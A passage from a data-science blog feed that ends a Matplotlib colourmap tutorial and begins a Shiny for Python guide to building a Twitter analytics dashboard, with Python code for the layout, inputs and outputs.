way to create a &lt;code&gt;LinearSegmentedColormap&lt;/code&gt;: the &lt;code&gt;.from_list()&lt;/code&gt; method. This takes a name and a
list of colours to be used as equally spaced anchor points.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;color_list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;#12a79d&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#293d9b&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#4898a8&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#40b93c&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;seg_cmap &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; LinearSegmentedColormap&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;from_list(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mymap&amp;#34;&lt;/span&gt;, color_list)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_cmap(seg_cmap)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/linseg-cbar-fromlist-17.png" alt="Horizontal colour bar with an x-axis range from 0 to 1. It shows a sequential colourmap
with colours gradually changing from turquoise to dark blue to light blue to green." width="768" /&gt;&lt;/p&gt;
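&lt;p&gt;To see what &amp;ldquo;equally spaced anchor points&amp;rdquo; means in terms of the dictionary format used earlier, the sketch below builds a &lt;code&gt;segmentdata&lt;/code&gt;-style dictionary by hand from the same list of colours. The helper names &lt;code&gt;hex_to_rgb&lt;/code&gt; and &lt;code&gt;segmentdata_from_list&lt;/code&gt; are hypothetical; this mirrors the idea rather than reproducing Matplotlib&amp;rsquo;s own code.&lt;/p&gt;

```python
def hex_to_rgb(colour):
    """Convert a "#rrggbb" string to (r, g, b) floats between 0 and 1."""
    return tuple(int(colour[i:i + 2], 16) / 255 for i in (1, 3, 5))


def segmentdata_from_list(colours):
    """Place the colours at equally spaced anchor points from 0 to 1."""
    last = len(colours) - 1
    cdict = {"red": [], "green": [], "blue": []}
    for k, colour in enumerate(colours):
        x = k / last  # anchor position: 0, 1/3, 2/3, 1 for four colours
        for channel, value in zip(("red", "green", "blue"), hex_to_rgb(colour)):
            # same value on both sides of the anchor, so there are no jumps
            cdict[channel].append((x, value, value))
    return cdict


color_list = ["#12a79d", "#293d9b", "#4898a8", "#40b93c"]
cdict = segmentdata_from_list(color_list)
print([row[0] for row in cdict["red"]])  # the four anchor positions
```

&lt;p&gt;Passing a dictionary like this to &lt;code&gt;LinearSegmentedColormap&lt;/code&gt; should give a map very similar to the one from &lt;code&gt;.from_list()&lt;/code&gt;, which is why the shortcut is usually the better choice.&lt;/p&gt;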
&lt;p&gt;In this blog we have covered the basics of how to format plots and create colourmaps in
Matplotlib. There is a lot more to be said about how to choose these
settings to create clear and accessible plots, but we will leave that for a future post.&lt;/p&gt;
&lt;h2 id="useful-links"&gt;Useful links&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://matplotlib.org/stable/gallery/style_sheets/style_sheets_reference.html" rel="external"&gt;Style sheets reference&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://matplotlib.org/stable/gallery/color/colormap_reference.html" rel="external"&gt;Available colourmaps reference&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://matplotlib.org/stable/tutorials/colors/colormaps.html" rel="external"&gt;Classes of colourmaps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://matplotlib.org/stable/tutorials/colors/colormap-manipulation.html" rel="external"&gt;Matplotlib tutorial on colourmaps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pypi.org/project/palettable/" rel="external"&gt;Palettable package documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/customising-matplotlib/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny for Python: Creating a simple Twitter analytics dashboard</title><link>https://www.jumpingrivers.com/blog/shiny-python-rtweet-dashboard/</link><pubDate>Thu, 03 Nov 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-python-rtweet-dashboard/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-python-rtweet-dashboard/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-python-rtweet-dashboard/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="introduction"&gt;Introduction&lt;/h1&gt;
&lt;p&gt;As someone with zero experience of using &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;Shiny in R&lt;/a&gt;, I saw the recent announcement that the framework had been made available to Python users as an opportunity to learn a new concept from a different perspective to most of my colleagues. I had been tasked with writing a Python-related blog post and had spent the past few weeks analysing Jumping Rivers&amp;rsquo; Twitter data (&lt;a href="https://www.twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt;), so creating a dashboard to display some of my findings and then writing about it seemed like a nice way to cap off my 6-week summer placement at Jumping Rivers.&lt;/p&gt;
&lt;p&gt;This post will take you through some of the source code for the dashboard I created, whilst I provide a bit of context for the Twitter project itself. For a more bare-bones tutorial on using &lt;a href="https://shiny.rstudio.com/py/" rel="external"&gt;Shiny for Python&lt;/a&gt;, you can check out another recent Jumping Rivers blog post &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/" rel="external"&gt;here&lt;/a&gt;. I suggest reading this first.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-python-rtweet-dashboard"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="twitter-project-background"&gt;Twitter Project Background&lt;/h2&gt;
&lt;p&gt;The &lt;a href="https://www.twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt; Twitter project accounted for the first half of my time at Jumping Rivers. The aim of the project was to look into some of the factors that may (or may not) have been affecting levels of engagement with &lt;a href="https://www.twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt; tweets. The project also looked at the locations of Twitter users that &lt;a href="https://www.twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt; tweets are reaching and who is interacting with them. The data used in this project was acquired using {&lt;a href="https://cran.r-project.org/web/packages/rtweet/rtweet.pdf" rel="external"&gt;rtweet&lt;/a&gt;}, an R package designed to collect data via Twitter&amp;rsquo;s API.&lt;/p&gt;
&lt;h1 id="creating-a-dashboard"&gt;Creating a Dashboard&lt;/h1&gt;
&lt;p&gt;You may know that Shiny apps consist of a &lt;strong&gt;user interface (UI)&lt;/strong&gt; and a &lt;strong&gt;server function&lt;/strong&gt;. We will go through developing these one at a time. If you haven&amp;rsquo;t already, you will need to install &lt;a href="https://shiny.rstudio.com/py/" rel="external"&gt;{shiny}&lt;/a&gt; and other dependencies before we begin, in this instance &lt;a href="https://plotnine.readthedocs.io/en/stable/" rel="external"&gt;{plotnine}&lt;/a&gt; for plotting and &lt;a href="https://pandas.pydata.org/" rel="external"&gt;{pandas}&lt;/a&gt; for some data manipulation. This should be done in a virtual environment which helps to keep dependencies required by different projects separate. The &lt;a href="https://pypi.org/project/Jinja2/" rel="external"&gt;{Jinja2}&lt;/a&gt; dependency is required for some styling that will be applied to the tabular view of our dataframe.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;# shell
virtualenv .venv
source .venv/bin/activate
pip install shiny pandas plotnine Jinja2
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="user-interface"&gt;User Interface&lt;/h2&gt;
&lt;p&gt;This application will be created using a single source file (app.py) that creates both the user interface and server-side logic. First, we will create the user interface. The UI takes a range of input and output functions, and defines what users will see when they visit the dashboard. The {shiny} package provides a &lt;code&gt;ui&lt;/code&gt; module which has a host of functions for quickly creating your layout, inputs and outputs.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# app.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ui
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="layout"&gt;Layout&lt;/h3&gt;
&lt;p&gt;A &lt;code&gt;ui.page_*&lt;/code&gt; function is a top level container for our UI elements. &lt;code&gt;ui.page_fluid()&lt;/code&gt; gives us a full-width container spanning the entire width of the viewport, regardless of screen size.&lt;/p&gt;
&lt;p&gt;A &lt;code&gt;ui.layout_sidebar()&lt;/code&gt; provides a convenient mechanism for laying out content into two columns, a narrower container typically used for user input controls and a wider one for the main content. This is done by including &lt;code&gt;ui.panel_sidebar()&lt;/code&gt; and &lt;code&gt;ui.panel_main()&lt;/code&gt; within our layout function.&lt;/p&gt;
&lt;p&gt;This is what we have so far, laying out the core structure of our page:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# app.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app_ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page_fluid(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;layout_sidebar(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;panel_sidebar(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;panel_main()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="inputs-and-outputs"&gt;Inputs and Outputs&lt;/h3&gt;
&lt;p&gt;Now, we are going to put some input and output functions into our UI. These follow a predictable format and are easy to remember:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ui.input_*&lt;/code&gt; for inputs, which take values from the user, client-side, and send them to the server.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ui.output_*&lt;/code&gt; for outputs, which will receive data from the server and render it on the client.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For our Twitter dashboard, we want a plot (&lt;code&gt;ui.output_plot()&lt;/code&gt;) that will show how different factors affect the number of interactions a tweet receives. We will also have a table (&lt;code&gt;ui.output_table()&lt;/code&gt;) that shows the most recent tweets posted by &lt;a href="https://www.twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt;. Above the table, some descriptive text (&lt;code&gt;ui.output_text()&lt;/code&gt;) will say how many tweets are being viewed. The only argument required for an output function is the &lt;code&gt;id&lt;/code&gt;, which must be unique and is used by the server function to identify the appropriate container in which to render the content.&lt;/p&gt;
&lt;p&gt;We want the user to be able to change the x-axis variable on the plot so they can see how each factor affects interactions. For this, &lt;code&gt;ui.input_select()&lt;/code&gt; is a reasonable choice to give users the option of a constrained set of values. The user will also choose the number of entries in our table (&lt;code&gt;ui.input_numeric()&lt;/code&gt;) and the factors they want to see (&lt;code&gt;ui.input_checkbox_group()&lt;/code&gt; is a good choice for a collection of binary choices like this). We will wrap this checkbox input in a &lt;code&gt;ui.panel_conditional()&lt;/code&gt;, so that it only appears if a certain condition is satisfied (in our case, if the user chooses to view any tweets at all). All input functions require:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;id&lt;/code&gt;: a unique identifier for the element, used to refer to its value server-side.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;label&lt;/code&gt;: the label shown to the viewer for the input.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Many input functions take additional arguments that control the specifics of that input, such as &lt;code&gt;min&lt;/code&gt; and &lt;code&gt;max&lt;/code&gt; values for numeric inputs, or &lt;code&gt;choices&lt;/code&gt; and &lt;code&gt;selected&lt;/code&gt; for inputs where the user needs to make a selection.&lt;/p&gt;
&lt;p&gt;A full user interface is described below:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# app.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ui
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# dictionary of choices for input_select&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# x axis of our graph of form {&amp;#34;value&amp;#34;: &amp;#34;UI label&amp;#34;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;choices_select &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Year&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;day&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Day&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;hour&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hour&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;media_type&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Media&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# dictionary of choices for checkbox group&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# factors for table of form {&amp;#34;value&amp;#34;: &amp;#34;UI label&amp;#34;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;choices_check &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;created_at&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Date&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Text&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;retweet_count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Retweets&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;favorite_count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Likes&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app_ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page_fluid(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;layout_sidebar(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;panel_sidebar(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# user inputs in the sidebar&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;input_select(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;X-axis Variable&amp;#34;&lt;/span&gt;, choices&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;choices_select, selected&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;input_numeric(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;num&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;How many tweets do you want to view?&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; max&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;panel_conditional(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# a client-side condition for whether to display this panel&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;input.num &amp;gt; 0 &amp;amp;&amp;amp; input.num &amp;lt;= 50&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;input_checkbox_group(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;cols&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Select which variables you want to view:&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; choices&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;choices_check,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; selected&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;([&lt;span style="color:#a5d6ff"&gt;&amp;#34;created_at&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;panel_main(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;output_plot(&lt;span style="color:#a5d6ff"&gt;&amp;#34;plot&amp;#34;&lt;/span&gt;), ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;output_text(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;), ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;output_table(&lt;span style="color:#a5d6ff"&gt;&amp;#34;table&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="server-function"&gt;Server Function&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; render
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Our server function will take three arguments: &lt;code&gt;input&lt;/code&gt;, &lt;code&gt;output&lt;/code&gt;, and &lt;code&gt;session&lt;/code&gt;, each of which will be passed to our function when we run the application. The &lt;code&gt;input&lt;/code&gt; parameter gives access to the values bound to the &lt;code&gt;input_X&lt;/code&gt; UI functions by their &lt;code&gt;id&lt;/code&gt;, &lt;code&gt;output&lt;/code&gt; gives us somewhere to direct our content to be rendered and &lt;code&gt;session&lt;/code&gt; contains some data specific to the browser session that is connected to the application.&lt;/p&gt;
&lt;p&gt;When defining outputs within our server function, we define a function whose name matches the &lt;code&gt;id&lt;/code&gt; of its corresponding output function in the UI. We precede this function with the decorators &lt;code&gt;@output&lt;/code&gt; and &lt;code&gt;@render.*&lt;/code&gt;. The render decorator should match the output function it&amp;rsquo;s referring to. For a plot we will use &lt;code&gt;@render.plot&lt;/code&gt;, for a table &lt;code&gt;@render.table&lt;/code&gt;, and so on. If we want to read the value of an input in our server function, we use &lt;code&gt;input.*&lt;/code&gt;. For example, if we have an input with &lt;code&gt;id=&amp;#34;abc&amp;#34;&lt;/code&gt;, we would call it with &lt;code&gt;input.abc()&lt;/code&gt;.&lt;/p&gt;
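&lt;p&gt;If the name-matching convention feels a little magical, the toy sketch below shows the general idea using plain Python. Everything here (&lt;code&gt;toy_output&lt;/code&gt;, &lt;code&gt;registry&lt;/code&gt;, &lt;code&gt;render_to&lt;/code&gt;) is hypothetical and is not Shiny&amp;rsquo;s implementation; it only illustrates how a decorator can register a function under its own name so that it can later be looked up by an &lt;code&gt;id&lt;/code&gt;.&lt;/p&gt;

```python
# Toy illustration of matching function names to output ids.
# This is NOT how Shiny works internally; all names are hypothetical.
registry = {}


def toy_output(func):
    """Register a render function under its own name."""
    registry[func.__name__] = func
    return func


@toy_output
def plot():
    return "content for the container with id 'plot'"


@toy_output
def table():
    return "content for the container with id 'table'"


def render_to(output_id):
    """Call the function registered for a given UI output id."""
    return registry[output_id]()


print(sorted(registry))   # the ids that have a matching function
print(render_to("plot"))  # content produced for the "plot" container
```

&lt;p&gt;In this toy version, an &lt;code&gt;id&lt;/code&gt; with no function of the same name has no entry in the registry, which is why the function name and the &lt;code&gt;id&lt;/code&gt; need to agree.&lt;/p&gt;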
&lt;p&gt;A full server function with imports might then look like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# app.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotnine&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;gg&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
